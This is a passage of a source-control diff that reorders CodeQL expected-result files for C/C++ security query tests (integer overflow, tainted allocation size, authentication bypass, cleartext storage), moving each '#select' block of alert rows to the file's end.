| test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:208:7:208:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:208:7:208:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:219:8:219:8 | x | test.cpp:215:11:215:14 | call to rand | test.cpp:219:8:219:8 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:215:11:215:14 | call to rand | uncontrolled value | edges | test.c:18:13:18:16 | call to rand | test.c:18:13:18:16 | call to rand | provenance | | | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | provenance | | 
@@ -174,3 +146,31 @@ nodes | test.cpp:215:11:215:14 | call to rand | semmle.label | call to rand | | test.cpp:219:8:219:8 | x | semmle.label | x | subpaths +#select +| test.c:21:17:21:17 | r | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:18:13:18:16 | call to rand | uncontrolled value | +| test.c:35:5:35:5 | r | test.c:34:13:34:18 | call to rand | test.c:35:5:35:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:34:13:34:18 | call to rand | uncontrolled value | +| test.c:45:5:45:5 | r | test.c:44:13:44:16 | call to rand | test.c:45:5:45:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:44:13:44:16 | call to rand | uncontrolled value | +| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | +| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | +| test.c:83:9:83:9 | r | test.c:81:14:81:17 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:14:81:17 | call to rand | uncontrolled value | +| test.c:83:9:83:9 | r | test.c:81:23:81:26 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:23:81:26 | call to rand | uncontrolled value | +| test.c:127:9:127:9 | r | test.c:125:13:125:16 | call to rand | test.c:127:9:127:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.c:125:13:125:16 | call to rand | uncontrolled value | +| test.c:133:5:133:5 | r | test.c:131:13:131:16 | call to rand | test.c:133:5:133:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:131:13:131:16 | call to rand | uncontrolled value | +| test.c:139:10:139:10 | r | test.c:137:13:137:16 | call to rand | test.c:139:10:139:10 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:137:13:137:16 | call to rand | uncontrolled value | +| test.c:157:9:157:9 | r | test.c:155:22:155:27 | call to rand | test.c:157:9:157:9 | r | This arithmetic expression depends on an $@, potentially causing an underflow. | test.c:155:22:155:25 | call to rand | uncontrolled value | +| test.cpp:25:7:25:7 | r | test.cpp:8:9:8:12 | call to rand | test.cpp:25:7:25:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:8:9:8:12 | call to rand | uncontrolled value | +| test.cpp:31:7:31:7 | r | test.cpp:13:10:13:13 | call to rand | test.cpp:31:7:31:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:13:10:13:13 | call to rand | uncontrolled value | +| test.cpp:37:7:37:7 | r | test.cpp:18:9:18:12 | call to rand | test.cpp:37:7:37:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:18:9:18:12 | call to rand | uncontrolled value | +| test.cpp:65:9:65:9 | x | test.cpp:62:19:62:24 | call to rand | test.cpp:65:9:65:9 | x | This arithmetic expression depends on an $@, potentially causing an underflow. | test.cpp:62:19:62:22 | call to rand | uncontrolled value | +| test.cpp:90:10:90:10 | x | test.cpp:86:10:86:13 | call to rand | test.cpp:90:10:90:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.cpp:86:10:86:13 | call to rand | uncontrolled value | +| test.cpp:102:10:102:10 | x | test.cpp:98:10:98:13 | call to rand | test.cpp:102:10:102:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:98:10:98:13 | call to rand | uncontrolled value | +| test.cpp:146:9:146:9 | y | test.cpp:137:10:137:13 | call to rand | test.cpp:146:9:146:9 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:137:10:137:13 | call to rand | uncontrolled value | +| test.cpp:154:10:154:10 | b | test.cpp:151:10:151:13 | call to rand | test.cpp:154:10:154:10 | b | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:151:10:151:13 | call to rand | uncontrolled value | +| test.cpp:171:11:171:16 | y | test.cpp:169:11:169:14 | call to rand | test.cpp:171:11:171:16 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:169:11:169:14 | call to rand | uncontrolled value | +| test.cpp:196:7:196:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:196:7:196:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:198:7:198:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:198:7:198:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:199:7:199:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:199:7:199:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:204:7:204:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:204:7:204:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. 
| test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:205:7:205:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:205:7:205:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:208:7:208:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:208:7:208:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:219:8:219:8 | x | test.cpp:215:11:215:14 | call to rand | test.cpp:219:8:219:8 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:215:11:215:14 | call to rand | uncontrolled value | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected index e321000d0caa..4235033abccc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected 
@@ -1,24 +1,3 @@ -#select -| test.cpp:43:31:43:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:43:38:43:44 | tainted | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:44:31:44:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:44:38:44:63 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:46:31:46:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:46:38:46:63 | ... + ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:49:25:49:30 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:49:32:49:35 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:50:17:50:30 | new[] | test.cpp:39:27:39:30 | **argv | test.cpp:50:17:50:30 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:53:21:53:27 | call to realloc | test.cpp:39:27:39:30 | **argv | test.cpp:53:35:53:60 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:128:17:128:22 | call to malloc | test.cpp:124:18:124:31 | *call to getenv | test.cpp:128:24:128:41 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:124:18:124:31 | *call to getenv | user input (an environment variable) | -| test.cpp:135:3:135:8 | call to malloc | test.cpp:133:19:133:32 | *call to getenv | test.cpp:135:10:135:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:133:19:133:32 | *call to getenv | user input (an environment variable) | -| test.cpp:152:4:152:9 | call to malloc | test.cpp:148:20:148:33 | *call to getenv | test.cpp:152:11:152:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:148:20:148:33 | *call to getenv | user input (an environment variable) | -| test.cpp:194:4:194:9 | call to malloc | test.cpp:190:19:190:32 | *call to getenv | test.cpp:194:11:194:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:190:19:190:32 | *call to getenv | user input (an environment variable) | -| test.cpp:209:4:209:9 | call to malloc | test.cpp:205:19:205:32 | *call to getenv | test.cpp:209:11:209:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:205:19:205:32 | *call to getenv | user input (an environment variable) | -| test.cpp:261:14:261:19 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:261:21:261:21 | s | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:269:2:269:7 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:269:9:269:18 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:271:2:271:7 | call to malloc | test.cpp:241:14:241:27 | *call to getenv | test.cpp:271:9:271:24 | call to get_tainted_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:241:14:241:27 | *call to getenv | user input (an environment variable) | -| test.cpp:275:2:275:9 | call to my_alloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:275:11:275:20 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:293:4:293:9 | call to malloc | test.cpp:289:20:289:33 | *call to getenv | test.cpp:293:11:293:29 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:289:20:289:33 | *call to getenv | user input (an environment variable) | -| test.cpp:321:4:321:9 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:321:11:321:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | -| test.cpp:338:3:338:8 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:338:10:338:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | -| test.cpp:385:25:385:33 | call to MyMalloc1 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:385:35:385:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | -| test.cpp:386:25:386:33 | call to MyMalloc2 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:386:35:386:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | edges | test.cpp:39:27:39:30 | **argv | test.cpp:40:16:40:19 | call to atoi | provenance | TaintFunction | | test.cpp:40:16:40:19 | call to atoi | test.cpp:43:38:43:44 | tainted | provenance | | 
@@ -109,3 +88,24 @@ nodes | test.cpp:385:35:385:38 | size | semmle.label | size | | test.cpp:386:35:386:38 | size | semmle.label | size | subpaths +#select +| test.cpp:43:31:43:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:43:38:43:44 | tainted | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:44:31:44:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:44:38:44:63 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:46:31:46:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:46:38:46:63 | ... + ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:49:25:49:30 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:49:32:49:35 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:50:17:50:30 | new[] | test.cpp:39:27:39:30 | **argv | test.cpp:50:17:50:30 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:53:21:53:27 | call to realloc | test.cpp:39:27:39:30 | **argv | test.cpp:53:35:53:60 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:128:17:128:22 | call to malloc | test.cpp:124:18:124:31 | *call to getenv | test.cpp:128:24:128:41 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:124:18:124:31 | *call to getenv | user input (an environment variable) | +| test.cpp:135:3:135:8 | call to malloc | test.cpp:133:19:133:32 | *call to getenv | test.cpp:135:10:135:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:133:19:133:32 | *call to getenv | user input (an environment variable) | +| test.cpp:152:4:152:9 | call to malloc | test.cpp:148:20:148:33 | *call to getenv | test.cpp:152:11:152:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:148:20:148:33 | *call to getenv | user input (an environment variable) | +| test.cpp:194:4:194:9 | call to malloc | test.cpp:190:19:190:32 | *call to getenv | test.cpp:194:11:194:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:190:19:190:32 | *call to getenv | user input (an environment variable) | +| test.cpp:209:4:209:9 | call to malloc | test.cpp:205:19:205:32 | *call to getenv | test.cpp:209:11:209:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:205:19:205:32 | *call to getenv | user input (an environment variable) | +| test.cpp:261:14:261:19 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:261:21:261:21 | s | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:269:2:269:7 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:269:9:269:18 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:271:2:271:7 | call to malloc | test.cpp:241:14:241:27 | *call to getenv | test.cpp:271:9:271:24 | call to get_tainted_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:241:14:241:27 | *call to getenv | user input (an environment variable) | +| test.cpp:275:2:275:9 | call to my_alloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:275:11:275:20 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:293:4:293:9 | call to malloc | test.cpp:289:20:289:33 | *call to getenv | test.cpp:293:11:293:29 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:289:20:289:33 | *call to getenv | user input (an environment variable) | +| test.cpp:321:4:321:9 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:321:11:321:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | +| test.cpp:338:3:338:8 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:338:10:338:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | +| test.cpp:385:25:385:33 | call to MyMalloc1 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:385:35:385:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. 
| test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | +| test.cpp:386:25:386:33 | call to MyMalloc2 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:386:35:386:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected index 795895891407..34aa8a7a7e4a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected 
@@ -1,15 +1,3 @@ -#select -| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | -| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | -| test2.cpp:39:9:39:11 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:39:9:39:11 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | -| test2.cpp:40:3:40:5 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:40:3:40:5 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | -| test5.cpp:17:6:17:18 | call to getTaintedInt | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:17:6:17:18 | call to getTaintedInt | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. 
| test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:44:7:44:10 | len2 | main.cpp:7:27:7:30 | **argv | test.c:44:7:44:10 | len2 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:54:7:54:10 | len3 | main.cpp:7:27:7:30 | **argv | test.c:54:7:54:10 | len3 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | edges | main.cpp:7:27:7:30 | **argv | main.cpp:8:17:8:20 | **argv | provenance | | | main.cpp:8:17:8:20 | **argv | test.c:10:28:10:31 | **argv | provenance | | 
@@ -65,3 +53,15 @@ nodes | test.c:54:7:54:10 | len3 | semmle.label | len3 | | test.c:54:7:54:12 | ... -- | semmle.label | ... -- | subpaths +#select +| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | +| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | +| test2.cpp:39:9:39:11 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:39:9:39:11 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | +| test2.cpp:40:3:40:5 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:40:3:40:5 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | +| test5.cpp:17:6:17:18 | call to getTaintedInt | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:17:6:17:18 | call to getTaintedInt | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. 
| test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:44:7:44:10 | len2 | main.cpp:7:27:7:30 | **argv | test.c:44:7:44:10 | len2 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:54:7:54:10 | len3 | main.cpp:7:27:7:30 | **argv | test.c:54:7:54:10 | len3 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected index 205d347a7740..117f94cfad8a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.expected 
@@ -1,10 +1,3 @@ -#select -| test.cpp:20:7:20:12 | call to strcmp | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:42 | *call to getenv | an environment variable | -| test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:42 | *call to getenv | test.cpp:31:14:31:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:42 | *call to getenv | an environment variable | -| test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:42 | *call to getenv | test.cpp:42:14:42:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:42 | *call to getenv | an environment variable | -| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:52:14:52:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | -| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:56:14:56:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | -| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:60:14:60:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | edges | test.cpp:16:25:16:42 | *call to getenv | test.cpp:16:25:16:42 | *call to getenv | provenance | | | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | provenance | | 
@@ -32,3 +25,10 @@ nodes | test.cpp:56:14:56:20 | *address | semmle.label | *address | | test.cpp:60:14:60:20 | *address | semmle.label | *address | subpaths +#select +| test.cpp:20:7:20:12 | call to strcmp | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:42 | *call to getenv | an environment variable | +| test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:42 | *call to getenv | test.cpp:31:14:31:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:42 | *call to getenv | an environment variable | +| test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:42 | *call to getenv | test.cpp:42:14:42:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:42 | *call to getenv | an environment variable | +| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:52:14:52:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | +| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:56:14:56:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | +| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:60:14:60:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected index 7598d27e2153..4133d62f00a3 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected @@ -1,6 +1,3 @@ -#select -| test2.cpp:110:3:110:6 | call to gets | test2.cpp:110:3:110:6 | *call to gets | test2.cpp:110:3:110:6 | *call to gets | This write into buffer 'password' may contain unencrypted data from $@. | test2.cpp:110:3:110:6 | *call to gets | user input (string read by gets) | -| test.cpp:58:3:58:9 | call to sprintf | test.cpp:53:27:53:30 | **argv | test.cpp:58:25:58:29 | *input | This write into buffer 'passwd' may contain unencrypted data from $@. | test.cpp:53:27:53:30 | **argv | user input (a command-line argument) | edges | test.cpp:53:27:53:30 | **argv | test.cpp:54:17:54:23 | *access to array | provenance | | | test.cpp:54:17:54:23 | *access to array | test.cpp:58:25:58:29 | *input | provenance | | @@ -10,3 +7,6 @@ nodes | test.cpp:54:17:54:23 | *access to array | semmle.label | *access to array | | test.cpp:58:25:58:29 | *input | semmle.label | *input | subpaths +#select +| test2.cpp:110:3:110:6 | call to gets | test2.cpp:110:3:110:6 | *call to gets | test2.cpp:110:3:110:6 | *call to gets | This write into buffer 'password' may contain unencrypted data from $@. | test2.cpp:110:3:110:6 | *call to gets | user input (string read by gets) | +| test.cpp:58:3:58:9 | call to sprintf | test.cpp:53:27:53:30 | **argv | test.cpp:58:25:58:29 | *input | This write into buffer 'passwd' may contain unencrypted data from $@. | test.cpp:53:27:53:30 | **argv | user input (a command-line argument) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected index 067222327f28..e283cbeb57bc 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected 
